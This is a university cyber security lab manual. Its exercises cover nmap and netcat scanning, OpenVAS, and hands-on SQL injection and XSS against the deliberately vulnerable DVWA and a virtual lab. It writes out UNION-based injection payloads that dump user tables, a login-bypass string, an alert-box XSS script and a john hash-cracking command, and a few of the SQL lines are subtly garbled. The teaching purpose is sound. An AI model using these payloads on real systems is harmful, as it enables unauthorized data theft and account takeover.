Government Engineering

College, Rajkot

Instrumentation and Control

Engineering Department
Rajkot

Subject: Cyber Security

LAB MANUAL
 CERTIFICATE

This is to certify that Mr. / Ms. ____________________________________

Class, ____________________ Enrollment No. _____________________

Has satisfactorily completed his/her term work in

____________________________________________________________

for the term ending in 20 / 20 .

Date:- ______________________________________________________

Staff-in-charge _____________________________________

Head of Department _____________________________________

P a g e 2 | 96
 INDEX

Sr. Experiment Page Date Remarks Faculty

No. Description No. Sign
1 Basic Commands 4

2 TCP scanning using 23

NMAP

3 Port scanning using 34 ‘

NMAP

4 TCP / UDP 40
connectivity using
Netcat
5 Network vulnerability 46
using OpenVAS

6 Web application 59
testing using DVWA

7 Manual SQL injection 70

using DVWA

8 XSS using DVWA 83

9 Automated SQL 86
injection with SqlMap

P a g e 3 | 96
Government Engineering College, Rajkot
Instrumentation and Control Engineering Department
Rajkot

Subject : Cyber Security

Experiment 1
AIM: BASIC COMMANDS OF WINDOWS AND KALI LINUX

P a g e 4 | 96
0.1 Basic Commands in Windows

1. ipconfig
Internet protocol configuration in Microsoft Windows is a console
application that displays all current TCP/IP network configuration values and can
modify Dynamic Host Configuration Protocol DHCP and Domain Name System
DNS settings.

2. ping
Ping is used to determine if a connection exists between your computer, and
another computer connected via TCP/IP. It sends small packets of information to
the other computer, which are returned if the connection is found, and lost
otherwise. Ping is a powerful utility to help determine network related problems.

P a g e 5 | 96
3. tracert
The tracert command is very similar to ping, and is used to visually see a
network packet being sent and received and the amount of hops required for that
packet to get to its destination. It shows you exactly how far a packet can go before
it fails. This will help you know if the connection problem is close, or more
towards the destination.

4. dir
Displays a list of files and subdirectories in a directory.

P a g e 6 | 96
5. cd
Changes the current directory

6. copy
Copies one or more files to another location.

7. delete
Deletes one or more files.

P a g e 7 | 96
8. xcopy

xcopy is a powerful version of the copy command with additional features. It

has the ability to move files, directories and even whole drives from one
destination to another. It also can preserve file attributes and long file names.

9. move
Moves files and renames files and directories.

10. mkdir
Creates a directory.

P a g e 8 | 96
11. rmdir
Removes (deletes) a directory.

12. msinfo32
This command shows the whole summary of our system. It includes details
of Hardware Resources, Components and Software Environment.

P a g e 9 | 96
13. dxdiag
DxDiag ("DirectX Diagnostics") is a diagnostics tool used to test DirectX
functionality and troubleshoot video- or sound-related hardware problems. DirectX
Diagnostic can save text files with the scan results. These files are often posted in
tech forums or attached to support emails in order to give support personnel a
better idea of the PC the requester is using in case the error is due to a hardware
failure or incompatibility.

P a g e 10 | 96
14. wmic os get osarchitecture
Is a batch file to check os architecture and then execute appropriate exe.

15. wmic os get lastbootuptime

It gives the date and time of last bootuptime for your system.
systeminfo | find "System Boot Time“
Gives the proper format for lastbootuptime.

P a g e 11 | 96
16. gpresult /r
Group Policy Results (GPResult.exe) command line tool verifies all policy
settings in effect for a specific user or computer.

P a g e 12 | 96
17. systeminfo
Displays detailed configuration information about a computer and its
operating system, including operating system configuration, security information,
product ID, and hardware properties, such as RAM, disk space, and network cards.
18. net statistics
Displays the statistics log for the local Workstation or Server service, or the
running services for which statistics are available. Used without parameters, net
statistics lists the running services for which statistics are available.

P a g e 13 | 96
0.2 Commands in Kali Linux

0.2.1 Operating System (OS)

1. id
Displays the user who executed the program.

2. uname -a
Displays the kernel name, hostname, kernel release, kernel version, machine
name, processor (if known), hardware (if known) and operating system.

3. lsb_release -a
Displays which version of Kali-Linux is currently installed.

4. ifconfig
Displays various bits of information about the NIC (e.g. IP addresses,
subnet, MAC address etc).

P a g e 14 | 96
Note: ifconfig -a, will display information about ALL NICs (including the ones
that are currently.
0.2.2 Networking
1. route -n
Displays the routing table (gateways information).

2. cat /etc/resolv.conf
Displays the DNS information.

P a g e 15 | 96
 3. cat /etc/network/interfaces
Displays the network interface configuration.

4. cat /etc/hosts
Static values for hostname lookups.

Note: Editing these values, will NOT change your hostname (for that look into
hostname & /etc/hostname).
0.2.3 Hardware
1. lspci
List all PCI devices (e.g. Internal devices).

P a g e 16 | 96
P a g e 17 | 96
2. lsusb
List all USB devices (e.g. External devices).

3. dmesg
Displays the contents of the kernel buffer (Whats in the kernel log).

P a g e 18 | 96
 Note: Warning, this may produce a very large output.
4. lsmod
Displays the status of modules in the Linux Kernel (e.g. what drivers
have been loaded).

P a g e 19 | 96
P a g e 20 | 96
0.2.4 Wi-Fi
1. airmon-zc –verbose
A modified version of airmon-ng, which helps with troubleshooting
and monitor mode.

2. rfkill
Enables (and disables) wireless devices.

3. iwconfig
Displays & controls 802.11 NICs.

P a g e 21 | 96
4. airmon-ng
Automates turning wireless cards into monitor mode.

P a g e 22 | 96
Government Engineering College, Rajkot
Instrumentation and Control Engineering Department
Rajkot

Subject : Cyber Security

Experiment 2
AIM: TCP SCANNING USING NMAP

P a g e 23 | 96
1.1 Why we require nmap ?


Hacking

Eric Raymond, compiler of “The New Hacker's Dictionary”, defines

a hacker as a clever hacker. A "good hack" is a clever solution to a
programming problem and "hacking" is the act of doing it. Raymond
records five conceivable attributes that qualify one as a hacker, which we
summarize here:
● A man who appreciates learning subtle elements of a programming
language and system.
● A man who appreciates really doing the programming rather than just
theorizing about it.
● A man equipped for appreciating another person's hacking.
● A man who gets programming rapidly.
● A man who is a specialist at a specific programming language and
system.


Types of Hackers
Hackers can be comprehensively arranged on the premise of why they are
hacking framework or why they are reveling hacking. There are
principally three sorts of hackers on this basis:
● Black-Hat Hacker
A black hat hackers or crackers are people with extraordinary
computing skills, resorting to malicious or destructive activities.
That is black hat hackers utilize their insight and aptitude for their
own particular individual picks up most likely by harming others.
● White-Hat Hacker
White hat hackers are those people pronouncing hacker skills and
utilizing them for protective purposes. This implies that the white
hat hackers utilize their insight and expertise for the benefit of
other people and for the benefit of everyone.
● Gray-Hat Hackers

P a g e 24 | 96
 These are people who work both offensively and protectively at
different times. We can't foresee their conduct. Sometimes they
utilize their skills for the benefit of all while in some different
times he utilizes them for their personal gains.


Ethical Hacking
Ethical hacking and ethical hacker are terms used to describe hacking
performed by a company or individual to help identify potential threats
on a computer or network.

• An ethical hacker attempts to bypass system security and search for

any weak points that could be exploited by malicious hackers. This
information is then used by the organization to improve the system
security, in an effort to minimize or eliminate any potential attacks.
• Independent Computer security professionals breaking into the
computer system.
• It will neither damage the target system nor steal the information.
• Evaluation of target system security is done and report back to
owners whenever any kind of vulnerability found.
• The purpose of ethical hacking is to evaluate the security of a
network or system's infrastructure. It entails finding and attempting
to exploit any vulnerabilities to determine whether unauthorized
access or other malicious activities are possible.

Required Skills of an Ethical Hacker:

• Certified Ethical Hacker (CEH)

• GIAC (Global Information Assurance Certification) Penetration Tester
(GPEN)
• Offensive Security Certified Professional (OSCP)
• Microsoft: skills in operation, configuration and management.
• Firewalls: configurations, and operation of intrusion detection systems.
• Routers: knowledge of routers, routing protocols, and access control lists
• Network Protocols: TCP/IP; how they function and can be manipulated.


Methodology of Hacking

Hacking is accomplishing access to a PC or PC system without lawful

authorization. For hacking any PC on a system it is obligatory that Hacker's

P a g e 25 | 96
 PC ought to be on same system or some sort of interchange systems
administration structure must be available between them. Implies if your
PC is with no system (implies standalone) then you are safe. Hacking is
unlawful according to Cyber Law of all nation so never attempt to be a
programmer however at any rate know the layouts, to defend yourself.

There are mainly five steps of Hacking Methodology, stated as below:

1. Reconnaissance
2. Scanning & Enumeration
3. Gaining access
4. Maintaining access
5. Clearing tracks (Covering Tracks)

1) Reconnaissance

The term Reconnaissance (Observation) alludes to the first

preattack period of the hacking procedure: it includes data gathering
practices that plan to profile the objective association or system for the
productive assault strategies.

By and large, hacking-significant surveillance exercises are

completed before a malignant assault for the accompanying two
reasons: 1) to enhance the likelihood of effective operation against the
objective, and 2) to enhance the likelihood of fruitful anonymization ( e.
g., concealing the assailant's character).

2) Scanning & Enumeration

The second stride of moral hacking and infiltration testing include

two terms that is examining are scanning and enumeration.

Scanning is utilized for mass target evaluation and ID of

listening administrations, focusing the assailant's consideration on the
most encouraging streets of passage.

Enumeration is for testing to distinguish legitimate client

records or ineffectively secured asset offers. It is the procedure to
remove substantial client account or sent out asset name from
frameworks. These methods are working framework particular.

P a g e 26 | 96
 3) Gaining Access

It use the gathered data for making an informed attempt to access

the target.

The Enumerated Data is looked for default accounts,

misconfigured services or software. The packages installed are looked
up in vulnerability databases.

A Telnet Session is then initiated to guess password or tools can be

employed for automated guessing. The exploited software is then tried
upon leading to access on the system.

4) Maintaining access

When a programmer has gotten entrance, they need to keep that

entrance for future abuse and assaults. Some of the time, programmers
solidify the framework from different programmers or security faculty
by securing their restrictive access with secondary passages, rootkits,
and Trojans. Once the programmer possesses the framework, they can
utilize it as a base to dispatch extra assaults. For this situation, the
possessed framework is at times alluded to as a zombie framework.

5) Clearing tracks (Covering Tracks)

To avoid getting traced and caught, Hacker clears all the tracks by
clearing all kinds of log and deleted the uploaded backdoor and
anything related stuff which may later reflect his presence. Examples of
exercises amid this period of the assault incorporate steganography, the
utilization of burrowing conventions, and modifying log documents.

Ethical hacking tools
Many tools have been developed for ethical hackers to evaluate security
levels. Here we describe some of the widely used tools in ethical hacking.
• Tools:

Samsopade

P a g e 27 | 96
 
Nmap

Nessus

MetaSploit

NetStumbler

Samspade

Samspade is the name of a Windows software tool designed to assist in

tracking down sources of e-mail spam. It is also the name of a free web
service that provides access to similar online tools. The Sam Spade utility
was authored by Steve Atkins in 1997. It is named after the fictional
character Sam Spade. The main features (query tools) are:

• Zone Transfer – ask a DNS server for all it knows about a domain.
• SMTP Relay Check – check whether a mail server allows third party
relaying.
• Scan Addresses – scan a range of IP addresses looking for open ports.
• Crawl website – search a website, looking for email addresses, offsite
links, etc.
• Browse web – browse the web in a raw http format.
• Check cancels – search your news server for cancel messages.
• Fast and Slow Traceroute – find the route packets take between you
and a remote system.
• S-Lang command – issue a scripting command; useful for debugging
scripts.
• Decode URL – decipher an obfuscated URL.
• Parse email headers – read email headers and make a guess about the
origin of the email.

Nmap

Nmap is a best tool ever that are used in the second phase of ethical
hacking means port scanning, Nmap was originally command line tool
that has been developed for only Unix/Linux based operating system but
now its windows version is also available and ease to use. It is use for
Operating system fingerprinting too.

P a g e 28 | 96
Nmap was originally command line tool that has been developed for only
Unix/Linux based operating system but now its windows version is also
available and ease to use.

For a quick and simple scan use.
• $ nmap 192.168.1.1


Now if want to scan a whole network than you have to type this with subnet.
• $ nmap 192.168.1.1/24 or $ nmap 192.168.1.*

Use -O for operating system.
• $ nmap -O 192.168.1.1

Nmap Interesting options
• -f fragments packets
• -D Launches decoy scans for concealment
• -I IDENT Scan – finds owners of processes (on Unix systems)
• -b FTP Bounce

Port Scan Types
• TCP Connect scan
• TCP SYN scan
• TCP FIN scan
• TCP Xmas Tree scan (FIN, URG, and PUSH)
• TCP Null scan
• TCP ACK scan
• UDP scan

Nessus

Nessus is the world most famous vulnerability scanner, Nessus has

been developed by Tenable network security, it is available for free of cost
for non-enterprise environment means for home user. It is a network
vulnerability scanner and use for finding the critical bugs on a system.

Automatic vulnerability scanning tools has a great importance in the

field of penetration testing/ethical hacking, professional use different tools
for different environment.
Nessus has been developed by Tenable network security, it is
available for free of cost for non-enterprise environment means for
home user. It is a network vulnerability scanner and use for finding the
critical bugs on a system, it can detect a vulnerabilities like:

P a g e 29 | 96
 
Misconfiguration or unpatched services.

Default passwords and common passwords, in general weak
passwords.

Available vulnerabilities on the system.

MetaSploit

The best tool ever, Metasploit contain a database that has a list of
available exploit and it is easy to use and best tool for doing penetration
testing, Metasploit framework is a sub project and is use to execute exploit
code against a machine and get the desire task done.

Metasploit is an open source security (Computer) project that contain

the information about vulnerabilities. If you just put all the available exploit
in a single place than the phenomena of metasploit occur. Metasploit
framework is a sub project and is use to execute exploit code against a
machine and get the desire task done.
Vulnerability is a weakness or a hole by which an attacker can
compromise a machine. Exploit may be a piece of code is an attack that
takes advantage of a vulnerability. A payload is the piece of software that
lets you control a computer system after it’s been exploited.
Metasploit project provides metasploit pro, metasploit express and
metasploit framework. Metasploit framework is an open source and
available for free for cross operating system platform (Windows, Linux).

NetStumbler

Once again for wardriving, well netstumbler are available for

windows based operating system, it works on windows based operating
system. It can detect WiFi that is IEEE 802.11b, 802.11g and 802.11a
networks. Mini Stumbler is also available and works on Windows CE based
system.

P a g e 30 | 96
 1.2 TCP Scanning using Nmap
Commands

nmap -sP 192.168.1.*

-sP: a ping request only


nmap –T4 192.168.1.0/24

-T4: Scanning

P a g e 31 | 96

nmap –sT 192.168.1.*

P a g e 32 | 96

nmap –sU 192.168.1.*

P a g e 33 | 96
Government Engineering College, Rajkot
Instrumentation and Control Engineering Department
Rajkot

Subject : Cyber Security

Experiment 3
AIM: PORT SCANNING USING NMAP

P a g e 34 | 96
2.1 Commands

nmap -sS -P0 -sV -O 192.168.1.0-255

-sS: perform TCP sync scan

-P0: perform a protocol scan; send request on each protocol by its
protocol number

-sV: determine the version number of the protocol running in the target
machine

-O: discover the operating system

P a g e 35 | 96

nmap -sT -p80 192.168.1.*

-sT: TCP connect scan probe

-p80: scan only port 80

P a g e 36 | 96

nmap –O 192.168.1.0

Specifies Operating system

P a g e 37 | 96

nmap –sF 192.168.1.0

-sF: Finding Open Filtered Ports

P a g e 38 | 96

nmap -sS 192.168.1.0/24 -D 192.168.1.44

-D: Decoy; hide the source IP address instead send sync scan request as
host 44 and 55

P a g e 39 | 96
Government Engineering College, Rajkot
Instrumentation and Control Engineering Department
Rajkot

Subject : Cyber Security

Experiment 4
AIM: TCP / UDP CONNECTIVITY USING NETCAT

P a g e 40 | 96
3.1 Basic Information


What is tcp?
• Transmission Control Protocol is core protocol of Internet Protocol Suite.
Commonly it is referred as TCP/IP. TCP provides trusted, ordered, error-
check delivery service etc. TCP provides connection oriented service.


What is udp?
• User Datagram Protocol. An application which do not require trusted
data transmission can use UDP. It provides connectionless service.


What is Netcat?
• Netcat is a networking program designed to read and write data across
both Transmission Control Protocol TCP and User Datagram Protocol
(UDP)
• Port scanning
• File transferring
• Banner grabbing
• Port listening and redirection
• Netcat installation in Linux :
• Most of Linux OS come with installed Netcat
• Type command to check version : nc –h or netcat –h
• If it’s not installed :
• open terminal
• Type : apt-get install netcat
• Type nc –h to conform installation

3.2 Commands

nc –h
• To get help menu in Netcat

P a g e 41 | 96
SSL BANNER GRABBING

P a g e 42 | 96
 HTTP BANNER GRABBING

HTTP BANNER GRABBING WITH AND WITHOUT NS

LISTNING SERVER ON PORT 12348

P a g e 43 | 96
 CONNECTING SERVER

• 192.168.106.128: SERVER IP ADDRESS

• 12348: PORT NO ON WHICH SERVER IS LISTNING

FINDING An OPEN PORT BETWEEN 1 -200

Creating a chat application

1) Start server listening on port 12348

P a g e 44 | 96
2) Connecting server using IP of server and Port 12348

P a g e 45 | 96
Government Engineering College, Rajkot
Instrumentation and Control Engineering Department
Rajkot

Subject : Cyber Security

Experiment 5
AIM: NETWORK VULNERABILITY USING OPENVAS

P a g e 46 | 96
4.1 Basic Information


What is OpenVAS?
• It is a world’s most advanced Open Source vulnerability scanner and
manager.
• OpenVAS is a combination of several services and tools offering a
comprehensive and powerful vulnerability scanning and vulnerability
management solution.
• Collects and manage security information for network, device and system.
• Uses client-server architecture.
• Server will keep track for all different vulnerability results.
• Scanner in OpenVAS will collect information.
• Inbuilt in Kali Linux.

4.2 Network Vulnerability using OpenVAS

Step 1: How to start OpenVAS
Note: Do not do internet login because it will take automatic update
and it may take so much time.
a) Application -> Kali Linux ->Vulnerability Tools ->
OpenVAS -> OpenVAS start

P a g e 47 | 96
 b) Application -> Kali Linux -> Vulnerability Tools ->
OpenVAS -> OpenVAS initial setup
Step 2: Connecting to the OpenVAS Web Interface
a) Open your browser
b) Type https://127.0.0.1:9392
c) Click on I understand the risks
d) Confirm Security Exception

P a g e 48 | 96
P a g e 49 | 96
Step 3: OpenVAS Login Box

Step 4: Login
a) Username and Password may be one of following :

User name : admin & password : admin

User name : chintan & password : chintan

User name : admin & password : chintan

User name : student & password : student

P a g e 50 | 96
Step 5: OpenVAS Security Assistant screen

Step 6: Update you Vulnerability Database Feeds

a) Administration-> NVT Feed-> Synchronize with Feed Now

P a g e 51 | 96
b) Administration->SCAP Database Feed-> Synchronize with
Feed Now

c) Administration->Cert Feed-> Synchronize with Feed Now

P a g e 52 | 96
Step 7: Add users (If required)
a) Administration->Users
• If you want to add user , delete user or change user access

P a g e 53 | 96
Step 8: Select Targets to Scan
a) Configuration -> Targets

b) Create new target

P a g e 54 | 96
c) Click on Create Target Button

d) View the new target

P a g e 55 | 96
Step 12: Create a Task
a) Scan Management -> New Task

b) Add new task i.e the target we created in previous step.

P a g e 56 | 96
P a g e 57 | 96
c) Click on Create Task Button

d) View new status of Task

e) After completion of scanning, you can download complete report in
PDF Format.

P a g e 58 | 96
Government Engineering College, Rajkot
Instrumentation and Control Engineering Department
Rajkot

Subject : Cyber Security

Experiment 6
AIM: WEB APPLICATION TESTING USING DVWA

P a g e 59 | 96
5.1 Basic Information


What is Damn Vulnerable Web App (DVWA)?
• It is a PHP/MYSQL web application which is considered as damn vulnerable.
• The main goal of DVWA is to be an aid for security professionals that is to
test their skills and their tools in legal environment.
• It helps web developers to proper understand the process of securing its web
application and also to teach or even learned by teachers or student for the
security in web application that to in class environment.
Important Note: DVWA should be install in the attacker’s device.

5.2 Steps to download open source DVWA from the network

Step 1: Download DVWA http://sourceforge.net/projects/dvwa/

P a g e 60 | 96
Step 2: Unzip download file by the command “unzip filename”.

P a g e 61 | 96
Step 3: Copy dvwa folder into Computer → File system → var → www.

P a g e 62 | 96
Step 4: Set permission of DVWA into 777 for this open Termianl and type
“chmod 777 /var/www/dvwa” and enter.

Step 5: a) Run Apache for this go to Application → kali linux → System Service →
HTTP → apache2start.
b) Apache run successfully.

P a g e 63 | 96
Step 6: a) Run My SQL for this go to Application → kali linux → System Service
→ MySQL → mysql start.
b) My SQL run successfully.

P a g e 64 | 96
Step 7: Create Database for dvwa
a) Open Terminal.
b) Type mysql –u root –p and enter.
c) When it ask for Password simply enter.
d) Now type create database dvwa; and enter.
e) If you want to exit terminal type exit and enter.

P a g e 65 | 96
Step 8: Go to your browser and write http://127.0.0.1/dvwa or http://localhost/dvwa

Step 9: Type your username and password by default it

is username – admin
password – password
then click in login

P a g e 66 | 96
Step 10: If you are getting this error Table 'dvwa.users' doesn't exist ?
Then go to url and type http://127.0.0.1/dvwa/setup.php#
Then click on Create/Reset Database.

P a g e 67 | 96
Step 11: Again go to url and type url http://127.0.0.1/dvwa/login.php

Step12: To Logon with default username and password its default data is username
= admin and password = password.

P a g e 68 | 96
P a g e 69 | 96
Government Engineering College, Rajkot
Instrumentation and Control Engineering Department
Rajkot

Subject : Cyber Security

Experiment 7
AIM: MANUAL SQL INJECTION USING DVWA

P a g e 70 | 96
6.1 Basic Information


What is SQL injection?
• SQL injection is also known as SQL fisting which is a technique usually
used to attack data derived applications.
• To pass a newly formed rogue SQL command to database it requires an
entry field in an attempt to get the website using SQL statements.
• To exploits a security vulnerabilities in an application software, SQL
injection technique.
• SQL injection is mainly used to attack vector for websites but it can attack
any type of SQL database.
Important Note: DVWA should be install in the attacker’s device.

6.2 For Manual SQL Injection using DVWA

Step 1: Ipaddress of the victim’s device should be known.
My victim’s device ipaddress is 172.21.30.133
Step 2: Open your Kali Linux and check your ipaddress using the command
“ifconfig”

P a g e 71 | 96
Step 3: Click on your browser
Step 4: Type the below url in your browser:
http://172.21.30.133/dvwa/login.php
Note: Here victim’s ipaddress is taken.

Step 5: a) Login: admin

P a g e 72 | 96
 b) Password: password
c) Click on Login

Step 6: Click on DVWA Security in Left hand side menu.

a) Set “low”
b) Click Submit

P a g e 73 | 96
Step 7: Click on SQL Injection in Left hand side menu.
a) Type 1 in the text box.
b) Click on Submit Button.

P a g e 74 | 96
Step 8: Displaying all possibilities that are false and all records that are true.
a) Type %’ or ‘0’=‘0 in the text box.
b) Click on Submit Button.

P a g e 75 | 96
Step 9: To known the version of the database following steps are followed:
a) Type %' or 0=0 union select null, version() # in the text box.
b) Click on Submit Button.

Step 10: To Display the database of the user following steps are followed:
a) Type %' or 0=0 union select null, database() # in the text box.
b) Click on Submit Button.

P a g e 76 | 96
Step 11: To Display whole table in the information_schema, following steps are
followed:
a) Type %' and 1=0 union select null, table_name from
information_schema.tables # in the text box.
b) Click on Submit Button.
Note: information_schema is the information database used to stores information
about all the other database that the MySQL server maintains.

P a g e 77 | 96
Step 12: To Display the detailed table whose prefix start with user table in the
information_schema, following steps are followed:
a) Type %' and 1=0 union select null, table_name from
information_schema.tables where table_name like 'user%'#
b) Click on Submit Button.

P a g e 78 | 96
Step 13: To Display all the columns in the information_schema user table, following
steps are followed:
a) %' and 1=0 union select null, concat(table_name,0x0a,column_name)
from information_schema.columns where table_name = 'users' #
b) Click on Submit Button
Note: Columns will be user_id, first_name, last_name, user and password.

P a g e 79 | 96
Step 14: To Display all the contents in the information_scheme user table, following
command is followed:
a) %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0
a,user,0x0a,password) from users #
b) Click on Submit Button.

P a g e 80 | 96
Step 15: Now, creating a file whose content will be username and hashed password.
a) To save the file, open terminal and create one folder
mkdir /root/Desktop/password
b) Copy all usernames and hashed passwords.
c) It require notepad file to paste the data and for that go to
Applications --> Accessories --> gedit

Step 16: Format of saving username and password.

a) Add “:” after username and press delete button after “ : ” which shows
that username and password is in one line and separated by “ : “
b) Save the file in “/root/Desktop/password” as password.txt

P a g e 81 | 96
Step 17: To run the password.txt file to get the original passwords of the respective
users, following steps are followed:
a) You should be in your password folder where password.txt file is
saved. (i.e. cd Desktop/password and press enter. )
(As my folder name is Jay and I have save directly in root I have done
cd Jay.)
b) Now type /usr/sbin/john --format=raw-MD5 password.txt
c) Press enter.

P a g e 82 | 96
Government Engineering College, Rajkot
Instrumentation and Control Engineering Department
Rajkot

Subject : Cyber Security

Experiment 8
AIM: XSS

P a g e 83 | 96
7.1 Basic Information
This practical will be perform in Web Application of Virtual Amrita Laboratories
Universalizing Education.


What is Cross Site Scripting (XSS)?
• Cross Site Scripting (XSS) is one type of computer security vulnerability
which is mainly found in web applications.
• It enables to attackers to inject client-side script into Web pages which is
access by other users.
• An attacker can send input like its username, password, and session ID
etc. but later can be captured by external script.
• The victim’s browser does not recognized that the script is not trusted.
Instead they will believe that the script comes from trusted source and
will execute the script. A malicious script can access any cookies, session
tokens, or any other information retrieved through that browser and used
with that site.


Current scenario
• Mr. John is a web developer who creates twitter like web applications. You
came across the website that he build and wanted to show him that his site is
vulnerable to XSS vulnerability.

Details:
• Reflected XSS occurs when user supplied values are not properly sanitized
before output. Here, in the example, go to the link provided and try to some
tweet. You can see that the result is echoed back. Now what if we try to
inject something to the tweet box (say JavaScript)? If the input is not
properly validated we can get the injected script work in the context of the
site. Lets see how it works:

• As a tweet, try to inject something like this:

P a g e 84 | 96
 I am tweet <Script> alert(“XSS”);</script>

You can see that we get a pop up printing the word “XSS” which
means that the injected JavaScript worked in the context of the site and it is
vulnerable to XSS vulnerability.

7.2 Practical

Step 1: Open your browser and type following url:

http://vlab.amrita.edu/?sub=85&brch=305
Step 2: Select concept 2: Basic XSS
Step 3: Choose simulator
Step 4: Type the given input in textbox and click Submit button.
<script>javascript:alert("This code execute");</script>
Step 5: Observe the output

P a g e 85 | 96
Government Engineering College, Rajkot
Instrumentation and Control Engineering Department
Rajkot

Subject : Cyber Security

Experiment 9
AIM: SQL INJECTION WITH SQLMAP

P a g e 86 | 96
8.1 Basic Information


What is SqlMap?
• SqlMap is an open source penetration testing tool that automates the
process of detecting and exploiting SQL injection flaws and taking over
of database servers. It comes with a kick-ass detection engine, many
niche features for the ultimate penetration tester and a broad range of
switches lasting from database fingerprinting, over data fetching from the
database, to accessing the underlying file system and executing
commands on the operating system via out-of-band connections.


Current Scenario
• Mr. Arun has created an awesome online shopping cart application. But he
forgot to do a security audit of the application and left it vulnerable to many
security issues. In this experiment, you will identify the spots or entry points
which are vulnerable to SQL injection attack.
• Find the search box, try entering a ‘(tick) in the search box and observe the
output that you are getting.

Details:
When the students entry a (tick) into the text box, the search query executed
by the application in the backend get modified. The modified query may
not be correct leading the database management system throwing an error
back. The error messages are valuable tips to the attacker and can be used
to construct needed injection input to get the required data which is
unauthorized for the attacker to access.

8.2 Practical

Step 1: Open your browser and type following url

http://vlab.amrita.edu/?sub=85&brch=305
Step 2: Select Concept 1: True or False SQL Injection Attack
Step 3: Select Simulator
Step 4: Choose page 2 and read the introduction
Step 5: After reading introduction choose page 3 and read the following instruction:

P a g e 87 | 96
Fuzzing
Here you learn how to fuzz web applications, basically to find out if a particular
web application is vulnerable or not. Fuzzing is a technique in which you will be
trying various vulnerable inputs and observing the behavior of the application. In
this experiment you are going to practice a simple fuzzing technique which will
make the underlying database to throw an error
• You can see an online shopping cart application onto left of your screen,
enter a'(tick) mark on to the search box and observe the output.
• The online shopping cart application is using mysql database as its backend
to store data and in order to access this data its underlying code is executing
SQL queries. If the developers are not sanitizing the user input properly, for
example if the application is not checking the values that are being entered
into the search field then the attacker will be able to modify the backend
query. When you enter a '(tick), the backend query get modified. The
injection of '(tick) has made the syntax of backend query incorrect thus
making the mysql to throw an error.
Step 5: You will see a shopping cart wed application

Step 6: Write ( ‘ ) on the textbox and click on search and observe the output.

P a g e 88 | 96
Step 7: Select the given output i.e. shown in Backend SQL Query and paste in
textbox then click Search and Observe the output.

Step 8: This process will continue and give hint to write your
query. Step 9: Choose page 4 and follow the following instruction

True or False SQL injection attack

• If the database is throwing an error during fuzzing then it means that the web
application is vulnerable to True or False SQL injection attack. In this
experiment you are going to login as admin without using a valid password,
• The shopping cart application that you can see to the left of the screen is
vulnerable to True or False injection attack. First try fuzzing in the login
page and see if you are able get an error.

P a g e 89 | 96
• If yes, then trying the following inputs and observe, if you are able to login
as administrator.

a) Type username as: admin' or 1=1#

b) Click on Sign in

Step 10: Analyzing the original query with modified query

a) Original Query: Select user from login where username=''
and password='';

P a g e 90 | 96
 b) Modified Query: select username from login where
username='admin' and 1=1# and password='password'
Step 11: Explanation of above queries
In the above original SQL query, if the username and password entered is
authentic then the query returns true with the username. Otherwise the query
returns false which shows that the username and password doesn't match or
doesn't exist. But the modified query will always return True as the condition
1=1 is always True. Two queries can be combined using an OR operator, if
either of the query returns True then the whole expression returns True. This
will enable us to login as administrator without a valid password.
Step 12: Choose page 5 and follow the instruction given bellow:

Blind SQL injection attack

• The Blind SQL injection techniques are used when the fuzzing doesn't yield any
error. So this require a different kind of approach in which you will try to inject
a query which get concatenated with the existing backend query. Let us try it
out, on to the right hand side of your screen you can see a shopping cart
application in which we have shown the search functionality. Try to search for
an item by entering its name, if the item is there then it will list it for you
otherwise it return an not item found error,
• The shopping cart application that you can see to the left of the screen is
vulnerable to True or False injection attack. First try fuzzing in the login page
and see if you are able get an error.
Step 13: Trying to do SLQ injection on database
a) Type django in textbox
b) Click on submit
c) Observe the output

P a g e 91 | 96
Step 14: Analyzing the original query
a) We have just written Django and it shows the output but
the original query should be
b) Original Query: select product_name, price from product where
name='django'
Step 15: Now you have to concatenate a SQL query with the existing user
input and let us see how the SQL query gets transformed.
a) Type input as django' union all select 1, 2# in textbox
b) Click on Submit button
c) Observe the output.

P a g e 92 | 96
Step 16: Analyzing Original query.
Now original input should be “ select product_name, price from product
where name='django' union all select 1,2#' ”. So, if you are able to see the
product_name and price of the product django, then it means that the above
query was valid. The union operator in SQL query allow you to concatenate
two SQL queries and execute. But it will only be a valid query if the number
of selections made in the right hand side and left hand side of the union
operator are equal. In the above query there are two selections in the left hand
side i.e. product_name and price, similar in the right hand side we have made
two selections ie 1 and 2. Usually when we are doing injection the right hand
side query will not be visible so we have to do trial and error with dummy
SQL query. Once we find out the number of selections made in the left hand
side, then we can build the injection query accordingly. The next experiment
will demonstrate how to dump mysql metadata database information.
Step 17: Choose page 6 and read the following instructions:

Dumping mysql metadata database

The search field in the shopping cart application is vulnerable to SQL injection.
We will be using this vulnerability to dump the data from metadata database. The
name of mysql metadata database isinformation_schema. It contains the details of
other databases and its tables. Usually only mysql root user have the access to this
database, but many web applications run SQL queries as mysql root leaving it
vulnerable and giving us the privilege to get information from it.

P a g e 93 | 96
Step 18: Dumping data from database
a) Type django' union select 1, table_name from
tables.information_schema# in the textbox
b) Click on Submit
c) Observe the output

Step 19: Analyzing the modified query.

a) Modified Query: select product_name, price from product
where name='django' union all select 1, table_name from
tables.information_schema#
b) As you can see in the output, above query listed all the tables in the
mysql database along with the product_name and price of django
product.
Step 20: Now we will see the columns of a specific table that we have found out.
a) Type input as django' union select 1, column_name from
columns.information_schema# in the textbox.

P a g e 94 | 96
 c) Click on submit.
d) Observe the output.

Step 21: Analyzing the modified query

a) Modified Query: select product_name, price from product
where name='django' union all select 1, column_name from
columns.information_schema where table_name='login'#
Step 22: Now you have the information regarding the tables and its columns. Using
this information we will construct an injection query to get the username and
password of all the users registered at the shopping cart application.
a) Type django' union select username, password from login#
b) Click on submit
c) Observe the output

P a g e 95 | 96
Step 23: Analyzing the modified query
a) Modified Query: select product_name, price from product where
name='django' union all select username, password from login#

P a g e 96 | 96